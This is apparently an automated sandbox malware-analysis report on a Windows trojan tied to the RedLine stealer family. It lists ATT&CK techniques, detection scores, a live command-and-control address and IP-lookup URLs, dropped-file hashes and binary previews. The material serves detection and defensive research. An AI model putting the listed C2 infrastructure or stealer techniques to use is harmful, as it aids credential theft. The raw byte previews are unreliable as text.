                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation
                  1
                  DLL Side-Loading
                  NTDS227
                  System Information Discovery
                  Distributed Component Object Model3
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection
                  1
                  Masquerading
                  LSA Secrets361
                  Security Software Discovery
                  SSHKeylogging12
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                  Valid Accounts
                  Cached Domain Credentials221
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items221
                  Virtualization/Sandbox Evasion
                  DCSync2
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Access Token Manipulation
                  Proc Filesystem11
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                  Process Injection
                  /etc/passwd and /etc/shadow1
                  System Owner/User Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  b3u71vBG0u.exe63%VirustotalBrowse
                  b3u71vBG0u.exe61%ReversingLabsWin32.Trojan.Strab
                  b3u71vBG0u.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  api.ip.sb0%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://tempuri.org/0%URL Reputationsafe
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                  https://www.ecosia.org/newtab/0%URL Reputationsafe
                  https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                  https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                  https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                  http://185.38.142.10:74740%Avira URL Cloudsafe
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                  https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                  https://duckduckgo.com/ac/?q=0%VirustotalBrowse
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                  https://ipinfo.io/ip%appdata%0%VirustotalBrowse
                  http://schemas.datacontract.org/2004/07/0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                  http://185.38.142.10:747412%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                  http://schemas.datacontract.org/2004/07/0%VirustotalBrowse
                  https://api.ip.sb0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnectResponse1%VirustotalBrowse
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%VirustotalBrowse
                  http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettings2%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%VirustotalBrowse
                  https://api.ip.sb0%VirustotalBrowse
                  https://duckduckgo.com/chrome_newtab0%VirustotalBrowse
                  http://185.38.142.10:7474/0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdateResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/CheckConnect2%VirustotalBrowse
                  https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/SetEnvironmentResponse1%VirustotalBrowse
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                  http://185.38.142.10:7474/12%VirustotalBrowse
                  185.38.142.10:74740%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                  http://tempuri.org/Endpoint/GetUpdates1%VirustotalBrowse
                  http://tempuri.org/00%Avira URL Cloudsafe
                  185.38.142.10:747412%VirustotalBrowse
                  http://tempuri.org/Endpoint/SetEnvironment1%VirustotalBrowse
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/GetUpdatesResponse1%VirustotalBrowse
                  http://tempuri.org/Endpoint/VerifyUpdate1%VirustotalBrowse
                  http://tempuri.org/00%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ip.sb
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://185.38.142.10:7474/true
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  185.38.142.10:7474true
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://ipinfo.io/ip%appdata%b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/chrome_newtabRegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://duckduckgo.com/ac/?q=RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoRegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://185.38.142.10:7474RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 12%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.datacontract.org/2004/07/RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.ip.sb/geoip%USERPEnvironmentROFILE%b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.ip.sbRegSvcs.exe, 00000001.00000002.1833328417.0000000002B91000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  https://www.ecosia.org/newtab/RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ac.ecosia.org/autocomplete?q=RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  https://api.ipify.orgcookies//settinString.Removegb3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchRegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://tempuri.org/0RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.drfalse
                  • URL Reputation: safe
                  unknown
                  http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  185.38.142.10
                  unknownPortugal
                  47674NETSOLUTIONSNLtrue
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1464015
                  Start date and time:2024-06-28 08:56:58 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 8s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:b3u71vBG0u.exe
                  renamed because original name is a hash value
                  Original Sample Name:464709f3215d06f6703eb4ecb607ae7a.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/51@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 59
                  • Number of non-executed functions: 266
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                  • Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
                  • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  TimeTypeDescription
                  02:57:59API Interceptor45x Sleep call for process: RegSvcs.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.38.142.102MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                  • 185.38.142.10:7474/
                  YPSvIjQCzd.exeGet hashmaliciousRedLineBrowse
                  • 185.38.142.10:7474/
                  Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                  • 185.38.142.10:7474/
                  MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                  • 185.38.142.10:7474/
                  No context
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  NETSOLUTIONSNL2MbHBiqXH2.rtfGet hashmaliciousRedLineBrowse
                  • 185.38.142.10
                  YPSvIjQCzd.exeGet hashmaliciousRedLineBrowse
                  • 185.38.142.10
                  Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.docGet hashmaliciousRedLineBrowse
                  • 185.38.142.10
                  MSH INV 2024-0117 Secure Payment Invoice for .exeGet hashmaliciousRedLineBrowse
                  • 185.38.142.10
                  sclfmLKwR7.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 185.38.142.103
                  3nYvEPuDi1.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 185.38.142.103
                  DS4T3FyXbu.elfGet hashmaliciousGafgyt, MiraiBrowse
                  • 185.38.142.103
                  pDHAW6Eo6E.elfGet hashmaliciousGafgytBrowse
                  • 185.38.142.103
                  q5TDXPUPJg.elfGet hashmaliciousGafgytBrowse
                  • 185.38.142.22
                  K8pQUoHdUc.elfGet hashmaliciousGafgytBrowse
                  • 185.38.142.22
                  No context
                  No context
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):2666
                  Entropy (8bit):5.345804351520589
                  Encrypted:false
                  SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
                  MD5:90757169D333CB9247B01FB0CAF14023
                  SHA1:C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
                  SHA-256:C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
                  SHA-512:A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                  Process:C:\Users\user\Desktop\b3u71vBG0u.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):97792
                  Entropy (8bit):7.025754446172288
                  Encrypted:false
                  SSDEEP:1536:zGkNRRFkyMZ/lYFV5X70lmn8tPpdXJqHOoRmJTUI0GVqIu5iL8A8U4:zGqylyhgXJqHO7wJU4
                  MD5:A178429ECD4CAD8C92AA4E2774F5F755
                  SHA1:372207EE15719CFE001F4EDE770EF5A18479F61F
                  SHA-256:90F3B22BEC26DF402A0AB8FEF7DF8FBF79E5D74F9ED0F25943D1D5E7E2FE020B
                  SHA-512:E171458A68435A342F39B1C98F96FBB059B85F3DA634134F4338DF02674CD71ADB6C086604F257624A781D71F8B530B1CDB5908B06035EFABA099B628AFBD823
                  Malicious:false
                  Reputation:low
                  Preview:...0OG4OAICT..3E.CVNY9SF.0F16JMV00LG4OEICT513EWCVNY9SFZ0F16J.V00BX.AE.J...2..b.&0Js6(_!CW'm5Q^"(@o',c&@_.,9c....>)>Uh<;@iV00LG4O..CTy00E..Z.Y9SFZ0F1.JOW;1|G4;DIC\513EWCh.X9SfZ0F16JMVp0Lg4OEKCT113EWCVN]9SFZ0F16.LV02LG4OEI@Tu.3EGCV^Y9SFJ0F!6JMV00\G4OEICT513E..WN.9SFZ.G1.NMV00LG4OEICT513EWCV.X9_FZ0F16JMV00LG4OEICT513EWCVNY9SFZ0F16JMV00LG4OEICT513eWC^NY9SFZ0F16JEv00.G4OEICT513Ey736-9SF.CG16jMV0DMG4MEICT513EWCVNY9sFZPhCE8.V00.C4OE.BT573EW5WNY9SFZ0F16JMVp0L..= %,751?EWCV.X9SDZ0FM7JMV00LG4OEICTu13.WCVNY9SFZ0F16JMV..MG4OEI.T511ERC..Y9c.Z0E16J.V06LG4OEICT513EWCVNY9SFZ0F16JMV00LG4OEICT513EWCVNY9HvS0f26JLV0!?F4OOCA*613ArnAh';SF^.@!6JK%20LM..FICP.03E|,RNY3X~.2F11%HV0:[P-.MICU.',O.JVNX..L[0B.0JM\C7LG>.`^].<13Dr.TOY={@Z0LB1JM\..TZ.FEIBq.62ESkPNY3 AZ0L..KLV6_DG4EIq.V51!G.JVNS4 OZ0@"29aW06_B%K;CCT?L2EWG(DY9YU\!B8EAMV:.@G4E*DCT?L2EWGGJ"8SF^/I.?JMW..^F4KmOCT?B4EWI9@Y9Yj@..86JLs..LG0gCIC^F63E]PPe.0Lx.9F17o..00Ho2OEC0S5197VCV>'3SFP.I16@eF00F(:OECnZ$5HDWCRf]8S@q<W5MKMV4.OF4IVORR. 3E]y.OY9B@L_T16@^^"8dT4OO&
                  Process:C:\Users\user\Desktop\b3u71vBG0u.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):79978
                  Entropy (8bit):7.912124781251231
                  Encrypted:false
                  SSDEEP:1536:ZEgnoNAibgXZs/CEMFCtRBQ1Q8aciwfIh93Y1GhuVNYH7ut:ZJnoNABvEMFqRe3EwO93uVEg
                  MD5:6AC263E637540A51C7EC77095E6EB38D
                  SHA1:979F12E57DD3DA0772DB830EBCE1F5C183747D19
                  SHA-256:E74EF457AF291610AFB6C315B80BCB6F9861A7A411F3F744FA3FAF1273D4DF9F
                  SHA-512:47977715357CCC597CB5D16E8AB5823A4D2F1D2EAB3554987A78C0317995689153F4F15870F26CA2B495FFF6D4881933D962F76134F12E3DDF6138613317C5EC
                  Malicious:false
                  Reputation:low
                  Preview:EA06..~..C4..}.iO..huNW:gE.......F.L(...*.V.L).....x..ftZ...k@..4.x.V1../....bfP...&.R.siE~CC...Z.zE(.[......_..'68.....Jg.[D.w@..-f+.../3.....o....S...4..)4:...-....f.x.6.p.S,.....T..Kf..-.U2.0..Zb.T..&tZ=..^.ZiS.4..K......5zt8...Q.>.p....Nk......@..+-^.^.....0.A..;y.......=C..f...M..).._..Z.Z(tY..h.P...M..5....Z......A.S...Y7..g........l..[..fpp.O.!....P...cE.P.^.....L(...:.0..x....].s.4.mJ..$3.4.O..eSi..r.Pm.y.N.^.P.a.\.e0.Sb<.5&.P..&t[.N......1..i.i..P....V!'.S.T..:....+s..faJ..(sze.}.W.....gD.d.....@.L).)....+[.5..B..f.*-N.P.Z$....'...*.j...4..n0Z..c!.......AO.L(.)...W.M..)-.wC..'....G.Q+3..V.!.N(..mZu...... ........H..w..U6...W..J]...<P..Z.&s@.<-T.w.p..\...e.ag..hu.4.gE..*.X..x..h....;..L)...>.C.T....C.O..:......f..-.a0.J'@...$..(.z.J.].T....^kM..j.H.>.4...*.v@..^`....@.W...z.".Y*.0..T...T:.Rs[..-...w%.W*T....G.P.Ri........:-..0...1k-Ra0.....{.]..fV..r..H@%.!..^.Hf...n.D..h....Uu.U........S&3jd...hNf..-6.y.E.p.Ca_.T....t.X.u...e.9K..m...
